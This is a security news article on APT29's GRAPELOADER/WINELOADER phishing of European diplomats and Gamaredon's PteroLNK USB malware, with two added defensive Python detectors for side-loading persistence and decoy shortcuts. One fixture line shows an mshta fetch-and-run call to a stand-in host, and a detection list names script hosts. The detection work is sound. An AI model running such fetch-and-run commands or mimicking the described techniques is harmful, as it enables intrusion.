APT29 Pushed GRAPELOADER Malware Threatening European Diplomats Via Wine-Tasting Lures


“APT29, a state-sponsored adversary, has come to be known as the mastermind behind a phishing campaign posing threats to European territories.”

Phishing campaigns against government and diplomatic networks continue to grow in number and sophistication. Here is the latest cyber threat news.
APT29, a Russian state-sponsored threat actor, has been linked to a sophisticated phishing campaign that uses a new variant of WINELOADER and a previously undocumented malware loader called GRAPELOADER to target diplomatic entities across Europe.

Check Point said in a technical analysis published earlier this week:

“While the improved WINELOADER variant is still a modular backdoor used in later stages, GRAPELOADER is a newly observed initial-stage tool used for fingerprinting, persistence, and payload delivery.”

“Despite differing roles, both share similarities in code structure, obfuscation, and string decryption. GRAPELOADER refines WINELOADER’s anti-analysis techniques while introducing more advanced stealth methods.”

Zscaler ThreatLabz initially reported on the deployment of WINELOADER in February 2024. The attacks used wine-tasting lures to compromise the systems of diplomatic personnel.

Although the effort was initially linked to a threat activity cluster called SPIKEDWINE, Google-owned Mandiant later linked it to the Russian Foreign Intelligence Service (SVR)-affiliated hacker organization APT29 (also known as Cozy Bear or Midnight Blizzard).

In the latest wave of attacks, recipients receive emails inviting them to a wine-tasting event, sent in the name of an unnamed European Ministry of Foreign Affairs. The emails lure targets into clicking a link that downloads a malicious ZIP archive (“wine.zip”), which in turn leads to the execution of GRAPELOADER.

The emails were sent from the domains bakenhof[.]com and silry[.]com. According to reports, the campaign primarily targeted several European countries, with a particular focus on Ministries of Foreign Affairs and on the embassies of non-European countries located in Europe. There are also hints that diplomats based in the Middle East may have been singled out.

The ZIP archive contains three files: a genuine PowerPoint executable (“wine.exe”), a DLL it depends on (“AppvIsvSubsystems64.dll”), and a malicious DLL (“ppcore.dll”) that is loaded by means of DLL side-loading when “wine.exe” runs.

The side-loaded DLL acts as a loader (GRAPELOADER) and drops the main payload. The loader establishes persistence by modifying the Windows Registry so that “wine.exe” is launched again every time the machine is rebooted.

GRAPELOADER is designed to collect basic host information and exfiltrate it to an external server in order to retrieve the next-stage shellcode. It also employs anti-analysis techniques such as runtime API resolution and string obfuscation.
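The chain described above (a renamed legitimate executable persisted via a Run entry, side-loading a DLL that sits next to it in a user-writable folder) leaves a pattern a defender can hunt for. The following is an added triage script, not code from the article or from Check Point's report. It works over a constructed snapshot of Run-key entries and directory listings so it runs offline; the user name, the persistence directory and the benign entries are assumptions for the example and are not the campaign's real paths. On a live host you would feed it the same data collected with Python's winreg module or a PowerShell export.

```python
import re
from pathlib import PureWindowsPath

# Roots where a persisted binary is expected to live. Anything else
# (AppData, Temp, Downloads, ProgramData, drive roots) is user-writable
# and worth a closer look. Assumption: a standard install on C:.
TRUSTED_ROOTS = (
    "c:\\windows\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)

_QUOTED = re.compile(r'^"([^"]+)"')
_EXE = re.compile(r'^(.+?\.exe)\b', re.IGNORECASE)


def extract_target(command: str) -> str:
    """Pull the executable path out of a Run-key command line.

    Handles both '"C:\\path with spaces\\x.exe" /arg' and
    'C:\\path\\x.exe /arg'. Unquoted commands are cut at the first
    '.exe'; anything else is returned unchanged for manual review.
    """
    command = command.strip()
    m = _QUOTED.match(command) or _EXE.match(command)
    return m.group(1) if m else command


def is_trusted_location(path: str) -> bool:
    """True when the executable lives under Windows or Program Files."""
    return str(PureWindowsPath(path)).lower().startswith(TRUSTED_ROOTS)


def triage_run_entries(entries: dict, listings: dict) -> list:
    """Flag Run-key entries matching the persisted side-loading pattern.

    entries:  Run value name -> command line
    listings: directory path -> list of file names found in it
    Returns (entry name, target path, [reasons]) for each hit.
    """
    norm_listings = {str(PureWindowsPath(k)).lower(): v for k, v in listings.items()}
    findings = []
    for name, command in entries.items():
        target = PureWindowsPath(extract_target(command))
        reasons = []
        if not is_trusted_location(str(target)):
            reasons.append("executable persisted from user-writable location")
            # A user-writable folder holding the EXE plus DLLs is the
            # side-loading layout: the EXE is legitimate, a DLL is not.
            siblings = norm_listings.get(str(target.parent).lower(), [])
            dlls = sorted(f for f in siblings if f.lower().endswith(".dll"))
            if dlls:
                reasons.append("DLL side-load candidate, DLLs next to target: "
                               + ", ".join(dlls))
        if reasons:
            findings.append((name, str(target), reasons))
    return findings


# Constructed sample data for the example (not real host data).
SAMPLE_RUN_ENTRIES = {
    "OneDrive": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background',
    "SecurityHealth": r"C:\Windows\System32\SecurityHealthSystray.exe",
    "wine": r"C:\Users\alice\AppData\Local\Microsoft\Office\wine.exe",
}
SAMPLE_LISTINGS = {
    r"C:\Program Files\Microsoft OneDrive": ["OneDrive.exe", "FileSyncShell64.dll"],
    r"C:\Users\alice\AppData\Local\Microsoft\Office": [
        "wine.exe", "ppcore.dll", "AppvIsvSubsystems64.dll",
    ],
}

if __name__ == "__main__":
    for entry, target, reasons in triage_run_entries(SAMPLE_RUN_ENTRIES, SAMPLE_LISTINGS):
        print(f"[!] {entry}: {target}")
        for r in reasons:
            print(f"    - {r}")
```

The OneDrive entry also has a DLL next to its executable, but it is not reported because the directory is under Program Files; the point of the check is the combination of a user-writable location and a DLL beside the persisted EXE, not either signal alone.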

The exact nature of the payload is unknown, but Check Point said it identified updated WINELOADER artifacts uploaded to the VirusTotal platform whose compilation timestamps match that of “AppvIsvSubsystems64.dll.”

Check Point added:

“With this information and the fact that GRAPELOADER replaced ROOTSAW, an HTA downloader used in past campaigns to deliver WINELOADER, we believe that GRAPELOADER ultimately leads to the deployment of WINELOADER.”

The findings coincide with HarfangLab’s description of Gamaredon’s PteroLNK VBScript malware, which the Russian threat actor uses to infect every USB drive connected to a compromised system. The malware exists in both PowerShell and VBScript versions.

Between December 2024 and February 2025, the PteroLNK samples were submitted to VirusTotal from Ukraine, which was the hacker group’s main target.

The malware was previously documented by ESET in September 2024. HarfangLab said:

“Both tools, when deployed on a system, repeatedly attempt to detect connected USB drives to drop LNK files and in some cases, also a copy of PteroLNK onto them.”

“Clicking on a LNK file can, depending on the particular PteroLNK version that created it, either directly retrieve the next stage from a C2 server, or execute a PteroLNK copy to download additional payloads.”

According to the French cybersecurity company, the PteroLNK VBScript files are heavily obfuscated and are responsible for dynamically generating an LNK dropper and a downloader at runtime. The LNK dropper script is set up to run every nine minutes, while the downloader is scheduled to run every three minutes.

The downloader uses a multi-stage, modular architecture to contact a remote server and retrieve additional malware. The LNK dropper, in contrast, spreads across local and network drives: it hides the original .pdf, .docx, and .xlsx files in the root directory of each drive and replaces them with deceptive shortcut counterparts. When a victim launches one of these shortcuts, PteroLNK runs in place of the expected document.
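The dropper behaviour just described (hidden original document in a drive root plus a shortcut of the same name whose target is a script host) is concrete enough to check for on a mounted drive. The following detector is an added example, not code from the article or from HarfangLab's report. It runs over a constructed listing of a removable drive's root rather than a real filesystem, so the document names, the shortcut targets and the example C2 URL are assumptions made for the example; the two payload file names it looks for are the ones the article lists further down. The shortcut naming it accepts (either "<doc>.<ext>.lnk" or "<doc>.lnk") is likewise an assumption.

```python
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Optional

DOC_EXTS = (".pdf", ".docx", ".xlsx")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe")
# Payload file names reported for this Gamaredon activity (from the article).
IOC_NAMES = (
    "NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms",
    "NTUSER.DAT.TMContainer00000000000000000002.regtrans-ms",
)


@dataclass
class Entry:
    """One file in a drive root, as a directory walk would report it."""
    name: str
    hidden: bool = False
    lnk_target: Optional[str] = None  # resolved shortcut command line, if a .lnk


def shortcut_stems(lnk_name: str) -> set:
    """Names a hidden original could have if this .lnk was dropped to shadow it.

    Assumption: the decoy is named either '<doc>.<ext>.lnk' or '<doc>.lnk'.
    """
    stem = lnk_name[:-4].lower()  # strip '.lnk'
    if stem.endswith(DOC_EXTS):
        return {stem}
    return {stem + ext for ext in DOC_EXTS}


def find_decoy_shortcuts(entries: list) -> list:
    """Return (shortcut name, [reasons]) for shortcuts that look like PteroLNK decoys."""
    hidden_docs = {e.name.lower(): e.name
                   for e in entries if e.hidden and e.name.lower().endswith(DOC_EXTS)}
    findings = []
    for e in entries:
        if not e.name.lower().endswith(".lnk"):
            continue
        reasons = []
        # 1. A hidden document whose name the shortcut mimics.
        for stem in sorted(shortcut_stems(e.name)):
            if stem in hidden_docs:
                reasons.append(f"shadows hidden original {hidden_docs[stem]}")
        # 2. The shortcut launches a script host instead of a document.
        #    Heuristic: first whitespace-separated token is the program.
        target = (e.lnk_target or "").lower()
        host = PureWindowsPath(target.replace('"', "").split(" ")[0]).name
        if host in SCRIPT_HOSTS:
            reasons.append(f"launches script host {host}")
        # 3. The command references a payload name reported for this activity.
        if any(ioc.lower() in target for ioc in IOC_NAMES):
            reasons.append("references known PteroLNK payload name")
        if reasons:
            findings.append((e.name, reasons))
    return findings


# Constructed listing of a removable drive's root (not real infection data).
SAMPLE_DRIVE_ROOT = [
    Entry("Contract.docx", hidden=True),
    Entry("Contract.docx.lnk", lnk_target=(
        r'C:\Windows\System32\wscript.exe //B '
        r'"E:\NTUSER.DAT.TMContainer00000000000000000002.regtrans-ms"')),
    Entry("Budget.pdf", hidden=True),
    Entry("Budget.lnk", lnk_target=r"C:\Windows\System32\mshta.exe http://example.invalid/stage"),
    Entry("Readme.txt"),
    Entry("Photo.jpg", hidden=True),
    Entry("Tools.lnk", lnk_target=r"C:\Program Files\7-Zip\7zFM.exe"),
]

if __name__ == "__main__":
    for lnk, reasons in find_decoy_shortcuts(SAMPLE_DRIVE_ROOT):
        print(f"[!] {lnk}")
        for r in reasons:
            print(f"    - {r}")
```

Each signal alone is weak (hidden files and shortcuts are normal on their own), so the function reports every reason it found for a shortcut and leaves the triage decision to the analyst; on a real drive the `lnk_target` field would be filled from the parsed shortcut rather than supplied by hand.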

HarfangLab added:

“The scripts are designed to allow flexibility for their operators, enabling easy modification of parameters such as file names and paths, persistence mechanisms (registry keys and scheduled tasks), and detection logic for security solutions on the target system.”

Both the LNK dropper and the downloader reference the same two payloads that the Broadcom-owned Symantec Threat Hunter team disclosed earlier this month as part of an attack chain distributing an updated version of the GammaSteel stealer:
● NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms (Downloader)
● NTUSER.DAT.TMContainer00000000000000000002.regtrans-ms (LNK dropper)

“Gamaredon operates as a critical component of Russia’s cyber operations strategy, particularly in its ongoing war with Ukraine,” the company said. “Gamaredon’s effectiveness lies not in technical sophistication but in tactical adaptability.”

“Their modus operandi combines aggressive spearphishing campaigns, rapid deployment of heavily obfuscated custom malware, and redundant C2 infrastructure. The group prioritizes operational impact over stealth, exemplified by pointing their DDRs to long-standing domains publicly linked to their past operations.”

About The Author

Suraj Koli is a content specialist with expertise in cybersecurity and B2B domains. He has written for the News4Hackers blog and Craw Security, as well as for sectors including business, law, food and beverage, and entertainment. He started his career in product sales, where he learned to understand products from the customer’s point of view, a skill that has served him well as a writer. He is currently a regular writer at Craw Security.
